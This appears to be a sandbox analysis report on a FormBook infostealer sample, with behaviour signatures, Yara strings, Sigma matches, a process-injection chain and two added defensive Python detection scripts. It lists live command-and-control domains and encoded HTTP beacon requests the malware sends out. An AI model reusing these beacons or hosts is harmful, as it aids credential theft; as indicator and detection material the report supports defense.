
Windows Analysis Report
plZuPtZoTk.exe

Overview

General Information

Sample name: plZuPtZoTk.exe (renamed because the original name is a hash value)
Original sample name: 5dd59f906130866850ab2c712dae59d43c0e0e30a6554022567957037c35dc28.exe
Analysis ID: 1588857
MD5: 03473468fd10d42dd617a426dcffa92d
SHA1: c1055cc7420cf9f54de46dc813920f34051e7131
SHA256: 5dd59f906130866850ab2c712dae59d43c0e0e30a6554022567957037c35dc28
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • plZuPtZoTk.exe (PID: 5328 cmdline: "C:\Users\user\Desktop\plZuPtZoTk.exe" MD5: 03473468FD10D42DD617A426DCFFA92D)
    • svchost.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\plZuPtZoTk.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • GtDTOqzvEb.exe (PID: 5932 cmdline: "C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 6136 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • GtDTOqzvEb.exe (PID: 5220 cmdline: "C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4524 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bb60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13cdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bb60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13cdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(11 further memory-dump entries are collapsed in the report)

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e033:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x161b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ee33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16fb2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
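The $a2 and $a3 hits above land at different offsets in each dump (0x2bb60/0x13cdf in the memory dumps, 0x2e033/0x161b2 in the mapped unpack, 0x2ee33/0x16fb2 in the raw unpack) but keep exactly the same distance from each other, which is what you expect when the same unpacked payload is found at different bases. The mapped and raw views differ by 0xE00, the usual gap between section file offsets and virtual addresses. The following Python is an added example, not part of the Joe Sandbox report or of the Yara rules it cites: it scans an arbitrary byte blob for the two rule strings and reports their offsets and spacing. The scanned buffer is constructed (zero-filled, with the two patterns placed at the offsets the report gives for 2.2.svchost.exe.400000.0.unpack); it is not malware.

```python
# Added example: locate the two Windows_Trojan_Formbook_1112e116 strings ($a2, $a3)
# in a byte blob and check their relative spacing against the offsets in the report.

# Byte patterns copied from the Strings column above.
FORMBOOK_STRINGS = {
    "$a2": bytes.fromhex("74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55"),
    "$a3": bytes.fromhex("1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01"),
}

# ($a3 offset, $a2 offset) for each object the report lists.
REPORT_OFFSETS = {
    "2.2.svchost.exe.400000.0.unpack": (0x161B2, 0x2E033),
    "2.2.svchost.exe.400000.0.raw.unpack": (0x16FB2, 0x2EE33),
    "process 2 / process 5 memory dumps": (0x13CDF, 0x2BB60),
}


def find_formbook_strings(blob: bytes) -> dict:
    """Return {name: [offsets]} for every occurrence of each pattern in blob."""
    hits = {}
    for name, pattern in FORMBOOK_STRINGS.items():
        offsets, start = [], 0
        while (idx := blob.find(pattern, start)) != -1:
            offsets.append(idx)
            start = idx + 1          # step by one so overlapping hits are not skipped
        hits[name] = offsets
    return hits


def a2_a3_spacing(hits: dict):
    """Distance from the first $a3 hit to the first $a2 hit, or None if either is absent.

    Every object in the report shows the same value (0x17E81), so a blob whose hits
    have a different spacing is not the same payload layout as this sample."""
    if not hits.get("$a2") or not hits.get("$a3"):
        return None
    return hits["$a2"][0] - hits["$a3"][0]


def build_test_blob(a3_offset: int, a2_offset: int, size: int) -> bytes:
    """Constructed buffer (not a real sample): zeros with the two patterns placed
    at the given offsets, mimicking where the report found them."""
    buf = bytearray(size)
    buf[a3_offset:a3_offset + len(FORMBOOK_STRINGS["$a3"])] = FORMBOOK_STRINGS["$a3"]
    buf[a2_offset:a2_offset + len(FORMBOOK_STRINGS["$a2"])] = FORMBOOK_STRINGS["$a2"]
    return bytes(buf)


if __name__ == "__main__":
    a3, a2 = REPORT_OFFSETS["2.2.svchost.exe.400000.0.unpack"]
    hits = find_formbook_strings(build_test_blob(a3, a2, 0x30000))
    print(hits, hex(a2_a3_spacing(hits)))
```

To use it on a real dump, read the file as bytes and pass it to find_formbook_strings; a match of both strings with spacing 0x17E81 is the same layout the report observed, a match with different spacing still deserves a look but is a different build or a relocated copy.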

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\plZuPtZoTk.exe", CommandLine: "C:\Users\user\Desktop\plZuPtZoTk.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\plZuPtZoTk.exe", ParentImage: C:\Users\user\Desktop\plZuPtZoTk.exe, ParentProcessId: 5328, ParentProcessName: plZuPtZoTk.exe, ProcessCommandLine: "C:\Users\user\Desktop\plZuPtZoTk.exe", ProcessId: 6644, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\plZuPtZoTk.exe", CommandLine: "C:\Users\user\Desktop\plZuPtZoTk.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\plZuPtZoTk.exe", ParentImage: C:\Users\user\Desktop\plZuPtZoTk.exe, ParentProcessId: 5328, ParentProcessName: plZuPtZoTk.exe, ProcessCommandLine: "C:\Users\user\Desktop\plZuPtZoTk.exe", ProcessId: 6644, ProcessName: svchost.exe
            No Suricata rule has matched
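Both Sigma matches above fire on one event: svchost.exe (PID 6644) started by an executable in the user's Desktop folder, and running with the parent's command line rather than its own. The second detail is the telltale of the "Creates a process in suspended mode" / "Writes to foreign memory regions" / "Modifies the context of a thread in another process" signatures further up: the image on disk is svchost.exe, but the process was created with plZuPtZoTk.exe's command line and its memory replaced. The following Python is an added example, not part of the report and not the Sigma project's rule: a triage pass over Sysmon-style process-creation records that reproduces the uncommon-parent logic and adds the command-line/image mismatch check. The first record is copied from the Sigma data above; the second is a constructed benign service start used as the negative case. The parent allowlist is an assumption kept deliberately short (services.exe only); the published rule filters a longer list of legitimate parents.

```python
# Added example: two checks over process-creation events, applied to the event
# behind the report's Sigma matches and to a constructed benign svchost start.
import ntpath

EVENTS = [
    {   # copied from the Sigma match data in the report
        "ProcessId": 6644,
        "Image": r"C:\Windows\SysWOW64\svchost.exe",
        "CommandLine": r'"C:\Users\user\Desktop\plZuPtZoTk.exe"',
        "ParentProcessId": 5328,
        "ParentImage": r"C:\Users\user\Desktop\plZuPtZoTk.exe",
    },
    {   # constructed: a normal service host started by the Service Control Manager
        "ProcessId": 1234,
        "Image": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
        "ParentProcessId": 700,
        "ParentImage": r"C:\Windows\System32\services.exe",
    },
]

# Assumption for this example: only services.exe may start svchost.exe.
ALLOWED_SVCHOST_PARENTS = {r"c:\windows\system32\services.exe"}


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _exe_from_cmdline(cmdline: str) -> str:
    """Executable named by a Windows command line: the quoted first token, or the
    first whitespace-delimited token when unquoted. Returns the lower-cased basename."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        token = cmdline[1:end] if end != -1 else cmdline[1:]
    else:
        token = cmdline.split(None, 1)[0] if cmdline else ""
    return _basename(token)


def uncommon_svchost_parent(ev: dict) -> bool:
    """'Uncommon Svchost Parent Process' logic: svchost.exe whose parent is not allowlisted."""
    return (_basename(ev["Image"]) == "svchost.exe"
            and ev["ParentImage"].lower() not in ALLOWED_SVCHOST_PARENTS)


def cmdline_image_mismatch(ev: dict) -> bool:
    """The process image differs from the executable its own command line names.
    In the report svchost.exe carries plZuPtZoTk.exe's command line, the shape left
    behind when a suspended process has its memory replaced."""
    return _exe_from_cmdline(ev["CommandLine"]) != _basename(ev["Image"])


def triage(events):
    """Return [(ProcessId, [reasons])] for every event that trips at least one check."""
    findings = []
    for ev in events:
        reasons = []
        if uncommon_svchost_parent(ev):
            reasons.append("uncommon svchost parent")
        if cmdline_image_mismatch(ev):
            reasons.append("command line names a different executable than Image")
        if reasons:
            findings.append((ev["ProcessId"], reasons))
    return findings


if __name__ == "__main__":
    for pid, reasons in triage(EVENTS):
        print(pid, "; ".join(reasons))
```

The mismatch check is the more portable of the two: it needs no allowlist, and it is cheap to run over Sysmon Event ID 1 or Windows 4688 data wherever both Image and CommandLine are recorded. False positives come from launchers that legitimately rewrite their command line, so treat it as a triage signal rather than a block rule.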


            AV Detection

Source: http://www.ngmr.xyz/qj8y/?dbFX6=JLnL0&1ZqD=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg== | Avira URL Cloud: Label: malware
Source: http://www.zz82x.top/fk06/?1ZqD=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ==&dbFX6=JLnL0 | Avira URL Cloud: Label: malware
Source: http://www.ngmr.xyz/qj8y/ | Avira URL Cloud: Label: malware
Source: http://www.zz82x.top/fk06/ | Avira URL Cloud: Label: malware
Source: plZuPtZoTk.exe | Virustotal: Detection: 37%
Source: plZuPtZoTk.exe | ReversingLabs: Detection: 65%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: plZuPtZoTk.exe | Joe Sandbox ML: detected
Source: plZuPtZoTk.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GtDTOqzvEb.exe, 00000004.00000002.3281125755.000000000066E000.00000002.00000001.01000000.00000005.sdmp, GtDTOqzvEb.exe, 00000008.00000000.1982113880.000000000066E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: plZuPtZoTk.exe, 00000000.00000003.1463967810.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, plZuPtZoTk.exe, 00000000.00000003.1463798414.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812483353.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1814288047.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000003.1914243462.0000000004337000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.000000000467E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.00000000044E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000003.1911769094.000000000418A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: plZuPtZoTk.exe, 00000000.00000003.1463967810.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, plZuPtZoTk.exe, 00000000.00000003.1463798414.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1812483353.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1814288047.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911751520.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000005.00000003.1914243462.0000000004337000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.000000000467E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3283785897.00000000044E0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000005.00000003.1911769094.000000000418A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000002.00000003.1879019571.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911590267.0000000003400000.00000004.00000020.00020000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282046334.0000000001038000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000005.00000002.3281277788.0000000000686000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3284516753.0000000004B0C000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000000.1982686880.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2206667295.0000000004EAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000005.00000002.3281277788.0000000000686000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000005.00000002.3284516753.0000000004B0C000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000000.1982686880.00000000025FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2206667295.0000000004EAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000003.1879019571.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1911590267.0000000003400000.00000004.00000020.00020000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282046334.0000000001038000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A2DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009FC2A2 FindFirstFileExW
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A368EE FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A3698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A2D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A2D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A39642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A3979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A39B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A35C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_0034C0F0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_00339B60 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_00352158 4x nop then pop edi
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_043804DE 4x nop then mov ebx, 00000004h

            Networking

Source: DNS query: www.ngmr.xyz
Source: DNS query: www.030002803.xyz
Source: DNS query: www.astrafusion.xyz
Source: Joe Sandbox View | IP Address: 136.143.186.12
Source: Joe Sandbox View | IP Address: 161.97.142.144
Source: Joe Sandbox View | ASN Name: CONTABODE
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (10 occurrences)
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A3CE44 InternetReadFile,SetEvent,GetLastError,SetEvent
Source: global traffic | HTTP traffic detected: GET /r22w/?1ZqD=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q==&dbFX6=JLnL0 HTTP/1.1 | Host: www.healthyloveforall.net | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic | HTTP traffic detected: GET /fk06/?1ZqD=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ==&dbFX6=JLnL0 HTTP/1.1 | Host: www.zz82x.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic | HTTP traffic detected: GET /mgg3/?1ZqD=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY23gB1m4CBXHBSkrnrwKbx/qmY6AwmTWdie10g6VbJmKkWlw==&dbFX6=JLnL0 HTTP/1.1 | Host: www.ophthalmo.cloud | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic | HTTP traffic detected: GET /qj8y/?dbFX6=JLnL0&1ZqD=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg== HTTP/1.1 | Host: www.ngmr.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic | HTTP traffic detected: GET /5x7s/?1ZqD=G72WLubJMS3dcb26AEgi3aGXwYX/pSO4ef8LZR/GCsxFLMdiWd/rxNP93kykZnn+RGVOZz24Lnm2tnjD2KJLN51qk8LIdSpvhcJdwUuCC545HWD+B0z6B0HNWAHTPddxeA==&dbFX6=JLnL0 HTTP/1.1 | Host: www.specialgift.asia | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic | HTTP traffic detected: GET /bw0u/?1ZqD=QtOwEWL3Wb8oglkkfuLXaSHSreWpjDtOOnahtC8c9UbbFmMC6Wp+vCjxsEk2BpxEB3gHT+/6vot9OJxtQqkBMHc9XtXTW/yd7EP1snPpVQUS9+gXOgGxj0LXj8PsnCHHkg==&dbFX6=JLnL0 HTTP/1.1 | Host: www.030002803.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic | HTTP traffic detected: GET /9hv6/?1ZqD=ggQIo5gV7zHF4RoJrW67zXedyj4Z9AdEETJPM44fUDmvE5zVPN+96oHBfd6Q3012XKsPi7h4Ls5HOMc1y+WXq6tX0X203QdCFZPEDkOrZS9vV9N9P/Prcpb0HgUUjs6D2w==&dbFX6=JLnL0 HTTP/1.1 | Host: www.2bhp.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic | HTTP traffic detected: GET /m8yb/?1ZqD=llEfdMF3fC5v4v2APCHuOWcZRuF4MZ+X2MJb9QaOtduFh6ZmbzwgisfO5x3/A5+hir6Uv7mlcSwuThCcifsMM+utKUlvw3RLEUBt7B2DyxaXSuE2zij4fUwZyaVVEgXhww==&dbFX6=JLnL0 HTTP/1.1 | Host: www.lanxuanz.tech | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic | DNS traffic detected: DNS query: www.healthyloveforall.net
Source: global traffic | DNS traffic detected: DNS query: www.bonusgame2024.online
Source: global traffic | DNS traffic detected: DNS query: www.zz82x.top
Source: global traffic | DNS traffic detected: DNS query: www.ophthalmo.cloud
Source: global traffic | DNS traffic detected: DNS query: www.ngmr.xyz
Source: global traffic | DNS traffic detected: DNS query: www.specialgift.asia
Source: global traffic | DNS traffic detected: DNS query: www.030002803.xyz
Source: global traffic | DNS traffic detected: DNS query: www.2bhp.com
Source: global traffic | DNS traffic detected: DNS query: www.lanxuanz.tech
Source: global traffic | DNS traffic detected: DNS query: www.astrafusion.xyz
